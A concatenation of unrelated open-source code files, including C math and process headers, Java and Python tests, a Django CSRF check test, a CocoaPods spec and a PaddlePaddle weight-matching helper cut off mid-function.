/* Copyright (c) 2008, <NAME>. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #ifndef VEC4_H_INCLUDED #define VEC4_H_INCLUDED #include "utility.h" struct kmMat4; #pragma pack(push) /* push current alignment to stack */ #pragma pack(1) /* set alignment to 1 byte boundary */ typedef struct kmVec4 { kmScalar x; kmScalar y; kmScalar z; kmScalar w; } kmVec4; #pragma pack(pop) #ifdef __cplusplus extern "C" { #endif kmVec4* kmVec4Fill(kmVec4* pOut, kmScalar x, kmScalar y, kmScalar z, kmScalar w); kmVec4* kmVec4Add(kmVec4* pOut, const kmVec4* pV1, const kmVec4* pV2); kmScalar kmVec4Dot(const kmVec4* pV1, const kmVec4* pV2); kmScalar kmVec4Length(const kmVec4* pIn); kmScalar kmVec4LengthSq(const kmVec4* pIn); kmVec4* kmVec4Lerp(kmVec4* pOut, const kmVec4* pV1, const kmVec4* pV2, kmScalar t); kmVec4* kmVec4Normalize(kmVec4* pOut, const kmVec4* pIn); kmVec4* kmVec4Scale(kmVec4* pOut, const kmVec4* pIn, const kmScalar s); /**< Scales a vector to length s*/ kmVec4* kmVec4Subtract(kmVec4* pOut, const kmVec4* pV1, const kmVec4* pV2); kmVec4* kmVec4Mul( kmVec4* pOut,const kmVec4* pV1, const kmVec4* pV2 ); kmVec4* kmVec4Div( kmVec4* pOut,const kmVec4* pV1, const kmVec4* pV2 ); kmVec4* kmVec4MultiplyMat4(kmVec4* pOut, const kmVec4* pV, const struct kmMat4* pM); kmVec4* kmVec4Transform(kmVec4* pOut, const kmVec4* pV, const struct kmMat4* pM); kmVec4* kmVec4TransformArray(kmVec4* pOut, unsigned int outStride, const kmVec4* pV, unsigned int vStride, const struct kmMat4* pM, unsigned int count); int kmVec4AreEqual(const kmVec4* p1, const kmVec4* p2); kmVec4* kmVec4Assign(kmVec4* pOut, const kmVec4* pIn); #ifdef __cplusplus } #endif #endif /* VEC4_H_INCLUDED */
1,176
354
<gh_stars>100-1000 #ifndef _DEPROCESS_H #define _DEPROCESS_H /*------------------------------------------------------------------------- * drawElements Utility Library * ---------------------------- * * Copyright 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *//*! * \file * \brief Process abstraction. *//*--------------------------------------------------------------------*/ #include "deDefs.h" #include "deFile.h" DE_BEGIN_EXTERN_C /* Process types. */ typedef struct deProcess_s deProcess; deProcess* deProcess_create (void); void deProcess_destroy (deProcess* process); deBool deProcess_start (deProcess* process, const char* commandLine, const char* workingDirectory); deBool deProcess_isRunning (deProcess* process); deBool deProcess_waitForFinish (deProcess* process); const char* deProcess_getLastError (const deProcess* process); int deProcess_getExitCode (const deProcess* process); /* Non-blocking operations. */ deBool deProcess_terminate (deProcess* process); deBool deProcess_kill (deProcess* process); /* Files are owned by process - don't call deFile_destroy(). */ deFile* deProcess_getStdIn (deProcess* process); deFile* deProcess_getStdOut (deProcess* process); deFile* deProcess_getStdErr (deProcess* process); deBool deProcess_closeStdIn (deProcess* process); deBool deProcess_closeStdOut (deProcess* process); deBool deProcess_closeStdErr (deProcess* process); DE_END_EXTERN_C #endif /* _DEPROCESS_H */
660
764
{"symbol": "COMET","address": "0x4ceE978c126c43522765dE9ed02D9373C72AC290","overview":{"en": "Comet is a self-destructing currency; each transfer burns 1.4% of the amount transferred."},"email": "<EMAIL>","website": "https://comet14.com/","state": "NORMAL","links": {"blog": "","twitter": "https://twitter.com/comet_token?s=09","telegram": "https://t.me/Cometgroup","github": "https://github.com/comet14/Cometcontract/blob/master/cometcontractcode"}}
158
571
#include "consts.hpp" #include "gamma.hpp" #include <math.h> #include <limits> #include <boost/numeric/conversion/cast.hpp> namespace cephes { constexpr double ASYMP_FACTOR = 1e6; double lbeta_asymp(double a, double b, int *sgn); double lbeta_negint(int a, double b); double beta_negint(int a, double b); double beta(double a, double b) { double y; int sign = 1; if (a <= 0.0) { if (a == std::floor(a)) { if (a == boost::numeric_cast<int>(a)) { return beta_negint(boost::numeric_cast<int>(a), b); } else { goto overflow; } } } if (b <= 0.0) { if (b == std::floor(b)) { if (b == boost::numeric_cast<int>(b)) { return beta_negint(boost::numeric_cast<int>(b), a); } else { goto overflow; } } } if (std::fabs(a) < std::fabs(b)) { y = a; a = b; b = y; } if (std::fabs(a) > ASYMP_FACTOR * std::fabs(b) && a > ASYMP_FACTOR) { /* Avoid loss of precision in lgam(a + b) - lgam(a) */ y = lbeta_asymp(a, b, &sign); return sign * std::exp(y); } y = a + b; if (std::fabs(y) > MAXGAM || std::fabs(a) > MAXGAM || std::fabs(b) > MAXGAM) { int sgngam; y = lgam_sgn(y, &sgngam); sign *= sgngam; /* keep track of the sign */ y = lgam_sgn(b, &sgngam) - y; sign *= sgngam; y = lgam_sgn(a, &sgngam) + y; sign *= sgngam; if (y > MAXLOG) { goto overflow; } return (sign * std::exp(y)); } y = Gamma(y); a = Gamma(a); b = Gamma(b); if (y == 0.0) goto overflow; if (std::fabs(std::fabs(a) - std::fabs(y)) > std::fabs(std::fabs(b) - std::fabs(y))) { y = b / y; y *= a; } else { y = a / y; y *= b; } return (y); overflow: return (sign * std::numeric_limits<double>::infinity()); } /* Natural log of |beta|. 
*/ double lbeta(double a, double b) { double y; int sign; sign = 1; if (a <= 0.0) { if (a == std::floor(a)) { if (a == boost::numeric_cast<int>(a)) { return lbeta_negint(boost::numeric_cast<int>(a), b); } else { goto over; } } } if (b <= 0.0) { if (b == std::floor(b)) { if (b == boost::numeric_cast<int>(b)) { return lbeta_negint(boost::numeric_cast<int>(b), a); } else { goto over; } } } if (std::fabs(a) < std::fabs(b)) { y = a; a = b; b = y; } if (std::fabs(a) > ASYMP_FACTOR * std::fabs(b) && a > ASYMP_FACTOR) { /* Avoid loss of precision in lgam(a + b) - lgam(a) */ y = lbeta_asymp(a, b, &sign); return y; } y = a + b; if (std::fabs(y) > MAXGAM || std::fabs(a) > MAXGAM || std::fabs(b) > MAXGAM) { int sgngam; y = lgam_sgn(y, &sgngam); sign *= sgngam; /* keep track of the sign */ y = lgam_sgn(b, &sgngam) - y; sign *= sgngam; y = lgam_sgn(a, &sgngam) + y; sign *= sgngam; return (y); } y = Gamma(y); a = Gamma(a); b = Gamma(b); if (y == 0.0) { over: return (sign * std::numeric_limits<double>::infinity()); } if (std::fabs(std::fabs(a) - std::fabs(y)) > std::fabs(std::fabs(b) - std::fabs(y))) { y = b / y; y *= a; } else { y = a / y; y *= b; } if (y < 0) { y = -y; } return std::log(y); } /* * Asymptotic expansion for ln(|B(a, b)|) for a > ASYMP_FACTOR*max(|b|, 1). */ double lbeta_asymp(double a, double b, int *sgn) { double r = lgam_sgn(b, sgn); r -= b * std::log(a); r += b*(1-b)/(2*a); r += b*(1-b)*(1-2*b)/(12*a*a); r += - b*b*(1-b)*(1-b)/(12*a*a*a); return r; } /* * Special case for a negative integer argument */ double beta_negint(int a, double b) { int sgn; if (b == boost::numeric_cast<int>(b) && 1 - a - b > 0) { sgn = (boost::numeric_cast<int>(b) % 2 == 0) ? 1 : -1; return sgn * beta(1 - a - b, b); } else { return std::numeric_limits<double>::infinity(); } } double lbeta_negint(int a, double b) { double r; if (b == boost::numeric_cast<int>(b) && 1 - a - b > 0) { r = lbeta(1 - a - b, b); return r; } else { return std::numeric_limits<double>::infinity(); } } }
2,467
32,544
package com.baeldung.controllers; import br.com.caelum.vraptor.*; import br.com.caelum.vraptor.freemarker.FreemarkerView; import br.com.caelum.vraptor.validator.Validator; import com.baeldung.config.UserInfo; import com.baeldung.daos.UserDao; import com.baeldung.models.User; import org.mindrot.jbcrypt.BCrypt; import javax.inject.Inject; import javax.servlet.http.HttpServletRequest; import java.util.Objects; import java.util.logging.Logger; @Controller public class AuthController { private Validator validator; private UserDao userDao; private Result result; private UserInfo userInfo; private Logger logger = Logger.getLogger(getClass().getName()); public AuthController() { this(null, null, null, null); } @Inject public AuthController(Validator validator, UserDao userDao, Result result, UserInfo userInfo) { this.validator = validator; this.userDao = userDao; this.result = result; this.userInfo = userInfo; } @Get("/register") public void registrationForm() { result.use(FreemarkerView.class).withTemplate("auth/register"); } @Post("/register") public void register(User user, HttpServletRequest request) { validator.validate(user); if(validator.hasErrors()) { result.include("errors", validator.getErrors()); } validator.onErrorRedirectTo(this).registrationForm(); if(!user.getPassword() .equals(request.getParameter("password_confirmation"))) { result.include("error", "Passwords Do Not Match"); result.redirectTo(this).registrationForm(); } user.setPassword( BCrypt.hashpw(user.getPassword(), BCrypt.gensalt())); Object resp = userDao.add(user); if(resp != null) { result.include("status", "Registration Successful! 
Now Login"); result.redirectTo(this).loginForm(); } else { result.include("error", "There was an error during registration"); result.redirectTo(this).registrationForm(); } } @Get("/login") public void loginForm() { result.use(FreemarkerView.class).withTemplate("auth/login"); } @Post("/login") public void login(HttpServletRequest request) { String password = request.getParameter("user.password"); String email = request.getParameter("user.email"); if(email.isEmpty() || password.isEmpty()) { result.include("error", "Email/Password is Required!"); result.redirectTo(AuthController.class).loginForm(); } User user = userDao.findByEmail(email); if(user != null && BCrypt.checkpw(password, user.getPassword())) { userInfo.setUser(user); result.include("status", "Login Successful!"); result.redirectTo(IndexController.class).index(); } else { result.include("error", "Email/Password Does Not Match!"); result.redirectTo(AuthController.class).loginForm(); } } }
1,254
678
<reponame>bzxy/cydia<gh_stars>100-1000 /** * This header is generated by class-dump-z 0.2b. * * Source: /System/Library/PrivateFrameworks/iTunesStore.framework/iTunesStore */ #import <iTunesStore/ISOperation.h> @class NSString; @interface ISSetApplicationBadgeOperation : ISOperation { id _badgeValue; // 60 = 0x3c NSString *_bundleIdentifier; // 64 = 0x40 } @property(retain) NSString *bundleIdentifier; // G=0x21675; S=0x21689; @synthesize=_bundleIdentifier @property(retain) id badgeValue; // G=0x2163d; S=0x21651; @synthesize=_badgeValue // declared property setter: - (void)setBundleIdentifier:(id)identifier; // 0x21689 // declared property getter: - (id)bundleIdentifier; // 0x21675 // declared property setter: - (void)setBadgeValue:(id)value; // 0x21651 // declared property getter: - (id)badgeValue; // 0x2163d - (id)uniqueKey; // 0x21631 - (void)run; // 0x214d5 - (void)dealloc; // 0x21475 @end
362
17,085
<filename>python/paddle/fluid/tests/unittests/test_save_model_without_var.py # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import warnings import unittest import paddle import paddle.fluid as fluid from paddle.fluid.layers.device import get_places from paddle.fluid.executor import as_numpy class TestSaveModelWithoutVar(unittest.TestCase): def test_no_var_save(self): data = fluid.layers.data( name='data', shape=[-1, 1], dtype='float32', append_batch_size=False) data_plus = data + 1 if fluid.core.is_compiled_with_cuda(): place = fluid.core.CUDAPlace(0) else: place = fluid.core.CPUPlace() exe = fluid.Executor(place) exe.run(fluid.default_startup_program()) with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") fluid.io.save_inference_model( dirname='test', feeded_var_names=['data'], target_vars=[data_plus], executor=exe, model_filename='model', params_filename='params') expected_warn = "no variable in your model, please ensure there are any variables in your model to save" self.assertTrue(len(w) > 0) self.assertTrue(expected_warn == str(w[-1].message)) if __name__ == '__main__': unittest.main()
813
887
<filename>javers-core/src/main/java/org/javers/core/metamodel/type/MapContentType.java package org.javers.core.metamodel.type; /** * @author <NAME> */ public class MapContentType { private final JaversType keyType; private final JaversType valueType; public MapContentType(JaversType keyType, JaversType valueType) { this.keyType = keyType; this.valueType = valueType; } public JaversType getKeyType() { return keyType; } public JaversType getValueType() { return valueType; } }
214
602
package org.automon.implementations; import org.junit.After; import org.junit.Before; import org.junit.Test; import static org.assertj.core.api.Assertions.assertThat; import static org.mockito.Mockito.mock; public class OpenMonFactoryTest { private OpenMonFactory factory; private OpenMon defaultValue = mock(OpenMon.class); @Before public void setUp() throws Exception { factory = new OpenMonFactory(defaultValue); } @After public void tearDown() throws Exception { } @Test public void testDefault() throws Exception { // test valid values loaded by default with fully qualified class path. assertThat(factory.getInstance(OpenMonFactory.JAMON)).isInstanceOf(Jamon.class); assertThat(factory.getInstance(OpenMonFactory.JAVA_SIMON)).isInstanceOf(JavaSimon.class); assertThat(factory.getInstance(OpenMonFactory.METRICS)).isInstanceOf(Metrics.class); assertThat(factory.getInstance(OpenMonFactory.SYSOUT)).isInstanceOf(SysOut.class); assertThat(factory.getInstance(OpenMonFactory.NULL_IMP)).isInstanceOf(NullImp.class); assertThat(factory.getInstance(OpenMonFactory.NEW_RELIC)).isInstanceOf(NewRelicImp.class); assertThat(factory.getInstance(OpenMonFactory.STATSD)).isInstanceOf(StatsD.class); // test getting instance with the class name only (case insensitive) assertThat(factory.getInstance("jamon")).isInstanceOf(Jamon.class); assertThat(factory.getInstance("JAMon")).isInstanceOf(Jamon.class); assertThat(factory.getInstance("com.i.do.not.Exist")). describedAs("The default value should be returned if the constructor fails"). 
isEqualTo(defaultValue); } @Test public void testAddMultiple() throws Exception { factory.reset(); factory.add(OpenMonFactory.JAMON, OpenMonFactory.JAVA_SIMON); assertThat(factory.getInstance(OpenMonFactory.JAMON)).isInstanceOf(Jamon.class); assertThat(factory.getInstance(OpenMonFactory.JAVA_SIMON)).isInstanceOf(JavaSimon.class); assertThat(factory.getInstance("I_DO_NOT_EXIST")).isEqualTo(defaultValue); } @Test public void testGetLastToken() throws Exception { assertThat(OpenMonFactory.getJustClassName("com.mypackage.Jamon")).isEqualTo("Jamon"); assertThat(OpenMonFactory.getJustClassName("Jamon")).isEqualTo("Jamon"); } @Test public void testToString() throws Exception { assertThat(factory.toString()).contains("jamon, javasimon, metrics, micrometer, newrelicimp, nullimp, statsd, sysout"); } @Test public void testGetFirstInstance() throws Exception { assertThat(factory.getFirstInstance()).isNotNull(); assertThat(factory.getFirstInstance()).isNotEqualTo(defaultValue); } }
1,046
852
// Registers the L1TriggerKeyExt condition-format class with the framework's
// type-lookup machinery (TYPELOOKUP_DATA_REG comes from typelookup.h), so the
// type can be resolved by name at runtime.
#include "CondFormats/L1TObjects/interface/L1TriggerKeyExt.h"
#include "FWCore/Utilities/interface/typelookup.h"

TYPELOOKUP_DATA_REG(L1TriggerKeyExt);
61
1,068
import math import numpy as np import torch import gpytorch from gpytorch.models import AbstractVariationalGP from gpytorch.variational import (CholeskyVariationalDistribution, VariationalStrategy, AdditiveGridInterpolationVariationalStrategy) from gpytorch.mlls.variational_elbo import VariationalELBO from gpytorch.utils.grid import choose_grid_size """ Binary classifier with implementation of Stochastic-variational deep kernel learning https://arxiv.org/abs/1611.00336 """ class NeuralNetLayer(torch.nn.Sequential): """Fully connected network: features extractor layer""" def __init__(self, data_dim, output_dim): """Full connected network input->200->100->50->2 """ super(NeuralNetLayer, self).__init__() self.add_module('linear1', torch.nn.Linear(data_dim, 200)) self.add_module('bn1', torch.nn.BatchNorm1d(200)) self.add_module('relu1', torch.nn.ReLU()) self.add_module('linear2', torch.nn.Linear(200, 100)) self.add_module('bn2', torch.nn.BatchNorm1d(100)) self.add_module('relu2', torch.nn.ReLU()) self.add_module('linear3', torch.nn.Linear(100, 50)) self.add_module('bn3', torch.nn.BatchNorm1d(50)) self.add_module('relu3', torch.nn.ReLU()) self.add_module('linear4', torch.nn.Linear(50,output_dim)) # GP layer class GaussianProcessLayer(AbstractVariationalGP): """Gaussian Process layer using additive covariance kernel sturcture""" def __init__( self, num_dim, grid_bounds, grid_size, num_mixtures): """Initialize Gaussian process layer Args: num_dim(int): data input dimension grid_bound(tuple): bound of the grid, entries,represent min/max values of each dimensionn and represent number of inducing points grid_size(int): size of grid in each dimension num_mixture(int): number of mixture components """ variational_distribution = CholeskyVariationalDistribution( num_inducing_points=grid_size, batch_size=num_dim ) variational_strategy = AdditiveGridInterpolationVariationalStrategy( self, grid_size=grid_size, grid_bounds=[grid_bounds], num_dim=num_dim, 
variational_distribution=variational_distribution ) super(GaussianProcessLayer,self).__init__(variational_strategy) self.covar_module = gpytorch.kernels.SpectralMixtureKernel(num_mixtures=num_mixtures, ard_dum_dims=num_dim) self.mean_module = gpytorch.means.ConstantMean() self.grid_bounds = grid_bounds def forward(self,x): """Forward pass""" """ Args: x(pytorch tensor): training input """ mean = self.mean_module(x) covar = self.covar_module(x) return gpytorch.distributions.MultivariateNormal(mean, covar) # SV-DKL model class DKLModel(gpytorch.Module): def __init__( self, nnet_layer, num_dim, grid_bounds, grid_size, num_mixtures): """SV-DKL model Args: nnet_layer(pytorch neural net): feature extractor num_dim(int): data input dimension grid_bound(tuple): bound of the grid, entries,represent min/max values of each dimension and represent number of inducing points grid_size(int): size of grid in each dimension num_mixture(int): number of mixture components """ super(DKLModel, self).__init__() self.nnet_layer = nnet_layer self.gp_layer = GaussianProcessLayer(num_dim=num_dim, grid_bounds=grid_bounds, grid_size=grid_size, num_mixtures=num_mixtures ) self.grid_bounds = grid_bounds def forward(self,x): """Forward pass""" """ Args: x(pytorch tensor): training input """ features = self.nnet_layer(x) features = gpytorch.utils.grid.scale_to_bounds( features, self.grid_bounds[0], self.grid_bounds[1] ) res = self.gp_layer(features) return res
2,665
5,169
{ "name": "QCloudSDK", "version": "1.1.4.2", "summary": "QCloud SDK for iOS.", "homepage": "https://github.com/shingwasix/QCloudSDK", "license": { "type": "Copyright", "text": "Copyright ©2013-2016 Qcloud.com" }, "authors": { "<NAME>": "http://github.com/shingwasix" }, "source": { "http": "https://mc.qcloudimg.com/static/archive/a78a41f6eb769e421aa41fa607bc1501/qcloud-image-ios-v1.1.4.2.zip", "sha1": "a245280e55dcf2e60a53c38161b792f781d71b70" }, "platforms": { "ios": "5.0" }, "frameworks": [ "SystemConfiguration", "CoreTelephony" ], "pod_target_xcconfig": { "OTHER_LDFLAGS": "-lObjC" }, "default_subspecs": [ "Upload", "Download" ], "subspecs": [ { "name": "Upload", "libraries": [ "stdc++.6", "z" ], "source_files": "qcloud-image-ios-v1.1.4.2/QCloudUploadSDK/*.h", "vendored_libraries": "qcloud-image-ios-v1.1.4.2/QCloudUploadSDK/bitcode/真机&模拟器/*.a", "public_header_files": "qcloud-image-ios-v1.1.4.2/QCloudUploadSDK/*.h" }, { "name": "Download", "frameworks": "MobileCoreServices", "libraries": [ "stdc++.6", "xml2", "z" ], "source_files": "qcloud-image-ios-v1.1.4.2/QCloudDownloadSDK/真机&模拟器/QCloudDownloadSDK/Headers/*.h", "vendored_libraries": "qcloud-image-ios-v1.1.4.2/QCloudDownloadSDK/真机&模拟器/QCloudDownloadSDK/*.a", "public_header_files": "qcloud-image-ios-v1.1.4.2/QCloudDownloadSDK/真机&模拟器/QCloudDownloadSDK/Headers/*.h" } ] }
829
594
#define FIELDS2 long long l; #include "20040629-1.c"
23
764
{"symbol": "GRID","address": "0x12B19D3e2ccc14Da04FAe33e63652ce469b3F2FD","overview":{"en": ""},"email": "<EMAIL>","website": "https://gridplus.io","state": "NORMAL","links": {"blog": "https://blog.gridplus.io/","twitter": "https://twitter.com/gridplus","telegram": "https://gridplus.io/telegram","github": "https://github.com/gridplus"}}
126
61,676
from django.core.checks import Error
from django.core.checks.compatibility.django_4_0 import (
    check_csrf_trusted_origins,
)
from django.test import SimpleTestCase
from django.test.utils import override_settings


class CheckCSRFTrustedOrigins(SimpleTestCase):
    """Tests for the Django 4.0 CSRF_TRUSTED_ORIGINS scheme requirement check."""

    @override_settings(CSRF_TRUSTED_ORIGINS=['example.com'])
    def test_invalid_url(self):
        # An origin without an explicit scheme must be reported as 4_0.E001.
        expected = Error(
            'As of Django 4.0, the values in the CSRF_TRUSTED_ORIGINS '
            'setting must start with a scheme (usually http:// or '
            'https://) but found example.com. See the release notes for '
            'details.',
            id='4_0.E001',
        )
        self.assertEqual(check_csrf_trusted_origins(None), [expected])

    @override_settings(
        CSRF_TRUSTED_ORIGINS=['http://example.com', 'https://example.com'],
    )
    def test_valid_urls(self):
        # Origins carrying an explicit scheme produce no check messages.
        self.assertEqual(check_csrf_trusted_origins(None), [])
446
392
<filename>tests/test_propensityselect.py from nose.tools import * import numpy as np import causalinference.core.data as d import causalinference.core.propensity as p from utils import random_data def test_get_excluded_lin(): K1 = 4 included1 = [] ans1 = [0, 1, 2, 3] assert_equal(p.get_excluded_lin(K1, included1), ans1) K2 = 4 included2 = [3, 1] ans2 = [0, 2] assert_equal(p.get_excluded_lin(K2, included2), ans2) K3 = 3 included3 = [0, 1, 2] ans3 = [] assert_equal(p.get_excluded_lin(K3, included3), ans3) def test_get_excluded_qua(): lin1 = [0, 2, 3] qua1 = [(0, 3), (3, 3)] ans1 = [(0, 0), (0, 2), (2, 2), (2, 3)] assert_equal(p.get_excluded_qua(lin1, qua1), ans1) lin2 = [1, 2] qua2 = [] ans2 = [(1, 1), (1, 2), (2, 2)] assert_equal(p.get_excluded_qua(lin2, qua2), ans2) lin3 = [8, 5] qua3 = [(8, 8), (8, 5), (5, 5)] ans3 = [] assert_equal(p.get_excluded_qua(lin3, qua3), ans3) def test_calc_loglike(): X_c = np.array([[1, 2], [3, 7]]) X_t = np.array([[1, 4], [3, 6]]) lin = [1] qua = [(0, 0)] ans = -2.567814 assert np.allclose(p.calc_loglike(X_c, X_t, lin, qua), ans) def test_select_lin(): Y, D, X = random_data(K=4) X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [0, 1, 2, 3] C1 = np.random.rand(1) ans1 = [0, 1, 2, 3] assert_equal(p.select_lin(X_c_random, X_t_random, lin1, C1), ans1) X_c = np.array([[1, 2], [9, 7]]) X_t = np.array([[1, 4], [9, 6]]) lin2 = [] C2 = 0.07 ans2 = [] assert_equal(p.select_lin(X_c, X_t, lin2, C2), ans2) lin3 = [] C3 = 0.06 ans3 = [1, 0] assert_equal(p.select_lin(X_c, X_t, lin3, C3), ans3) lin4 = [1] C4 = 0.35 ans4 = [1] assert_equal(p.select_lin(X_c, X_t, lin4, C4), ans4) lin5 = [1] C5 = 0.34 ans5 = [1, 0] assert_equal(p.select_lin(X_c, X_t, lin5, C5), ans5) def test_select_lin_terms(): Y, D, X = random_data(K=4) X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [3, 0, 1] C1 = np.inf ans1 = [3, 0, 1] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin1, C1), ans1) lin2 = [2] C2 = 0 ans2 = [2, 0, 1, 3] 
assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin2, C2), ans2) lin3 = [] C3 = 0 ans3 = [0, 1, 2, 3] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin3, C3), ans3) lin4 = [3, 1] C4 = -34.234 ans4 = [3, 1, 0, 2] assert_equal(p.select_lin_terms(X_c_random, X_t_random, lin4, C4), ans4) X_c = np.array([[1, 2], [9, 7]]) X_t = np.array([[1, 4], [9, 7]]) lin5 = [] C5 = 0.06 ans5 = [1, 0] assert_equal(p.select_lin_terms(X_c, X_t, lin5, C5), ans5) def test_select_qua(): Y, D, X = random_data() X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [1, 0] qua1 = [(1, 0), (0, 0), (1, 1)] C1 = np.random.rand(1) ans1 = [(1, 0), (0, 0), (1, 1)] assert_equal(p.select_qua(X_c_random, X_t_random, lin1, qua1, C1), ans1) lin2 = [1] qua2 = [(1, 1)] C2 = np.random.rand(1) ans2 = [(1, 1)] assert_equal(p.select_qua(X_c_random, X_t_random, lin2, qua2, C2), ans2) X_c = np.array([[7, 8], [3, 10], [7, 10]]) X_t = np.array([[4, 7], [5, 10], [9, 8]]) lin3 = [0, 1] qua3 = [] C3 = 1.2 ans3 = [] assert_equal(p.select_qua(X_c, X_t, lin3, qua3, C3), ans3) lin4 = [0, 1] qua4 = [] C4 = 1.1 ans4 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua(X_c, X_t, lin4, qua4, C4), ans4) lin5 = [0, 1] qua5 = [(1, 1)] C5 = 2.4 ans5 = [(1, 1)] assert_equal(p.select_qua(X_c, X_t, lin5, qua5, C5), ans5) lin6 = [0, 1] qua6 = [(1, 1)] C6 = 2.3 ans6 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua(X_c, X_t, lin6, qua6, C6), ans6) lin7 = [0, 1] qua7 = [(1, 1), (0, 1)] C7 = 3.9 ans7 = [(1, 1), (0, 1)] assert_equal(p.select_qua(X_c, X_t, lin7, qua7, C7), ans7) lin8 = [0, 1] qua8 = [(1, 1), (0, 1)] C8 = 3.8 ans8 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua(X_c, X_t, lin8, qua8, C8), ans8) def test_select_qua_terms(): Y, D, X = random_data() X_c_random, X_t_random = X[D==0], X[D==1] lin1 = [0, 1] C1 = np.inf ans1 = [] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin1, C1), ans1) lin2 = [1, 0] C2 = 0 ans2 = [(1, 1), (1, 0), (0, 0)] assert_equal(p.select_qua_terms(X_c_random, X_t_random, 
lin2, C2), ans2) lin3 = [0] C3 = -983.340 ans3 = [(0, 0)] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin3, C3), ans3) lin4 = [] C4 = 34.234 ans4 = [] assert_equal(p.select_qua_terms(X_c_random, X_t_random, lin4, C4), ans4) X_c = np.array([[7, 8], [3, 10], [7, 10]]) X_t = np.array([[4, 7], [5, 10], [9, 8]]) lin5 = [0, 1] C5 = 1.1 ans5 = [(1, 1), (0, 1), (0, 0)] assert_equal(p.select_qua_terms(X_c, X_t, lin5, C5), ans5) def test_propensityselect(): D = np.array([0, 0, 0, 1, 1, 1]) X = np.array([[7, 8], [3, 10], [7, 10], [4, 7], [5, 10], [9, 8]]) Y = random_data(D_cur=D, X_cur=X) data = d.Data(Y, D, X) propensity1 = p.PropensitySelect(data, [], 1, 2.71) lin1 = [1] qua1 = [] coef1 = np.array([6.5424027, -0.7392041]) loglike1 = -3.627939 fitted1 = np.array([0.6522105, 0.2995088, 0.2995088, 0.7970526, 0.2995088, 0.6522105]) se1 = np.array([6.8455179, 0.7641445]) keys = {'lin', 'qua', 'coef', 'loglike', 'fitted', 'se'} assert_equal(propensity1['lin'], lin1) assert_equal(propensity1['qua'], qua1) assert np.allclose(propensity1['coef'], coef1) assert np.allclose(propensity1['loglike'], loglike1) assert np.allclose(propensity1['fitted'], fitted1) assert np.allclose(propensity1['se'], se1) assert_equal(set(propensity1.keys()), keys) propensity2 = p.PropensitySelect(data, [0, 1], 1, 2.71) lin2 = [0, 1] qua2 = [] coef2 = np.array([6.8066090, -0.0244874, -0.7524939]) loglike2 = -3.626517 fitted2 = np.array([0.6491366, 0.3117840, 0.2911631, 0.8086407, 0.3013733, 0.6379023]) se2 = np.array([8.5373779, 0.4595191, 0.8106499]) assert_equal(propensity2['lin'], lin2) assert_equal(propensity2['qua'], qua2) assert np.allclose(propensity2['coef'], coef2) assert np.allclose(propensity2['loglike'], loglike2) assert np.allclose(propensity2['fitted'], fitted2) assert np.allclose(propensity2['se'], se2)
3,192
1,150
import os import numpy as np import paddle def match_state_dict(model_state_dict, weight_state_dict): """ Match between the model state dict and pretrained weight state dict. Return the matched state dict. The method supposes that all the names in pretrained weight state dict are subclass of the names in models`, if the prefix 'backbone.' in pretrained weight keys is stripped. And we could get the candidates for each model key. Then we select the name with the longest matched size as the final match result. For example, the model state dict has the name of 'backbone.res2.res2a.branch2a.conv.weight' and the pretrained weight as name of 'res2.res2a.branch2a.conv.weight' and 'branch2a.conv.weight'. We match the 'res2.res2a.branch2a.conv.weight' to the model key. """ model_keys = sorted(model_state_dict.keys()) weight_keys = sorted(weight_state_dict.keys()) def match(a, b): if a.startswith('backbone.res5'): # In Faster RCNN, res5 pretrained weights have prefix of backbone, # however, the corresponding model weights have difficult prefix, # bbox_head. b = b[9:] return a == b or a.endswith("." + b) match_matrix = np.zeros([len(model_keys), len(weight_keys)]) for i, m_k in enumerate(model_keys): for j, w_k in enumerate(weight_keys): if match(m_k, w_k): match_matrix[i, j] = len(w_k) max_id = match_matrix.argmax(1) max_len = match_matrix.max(1) max_id[max_len == 0] 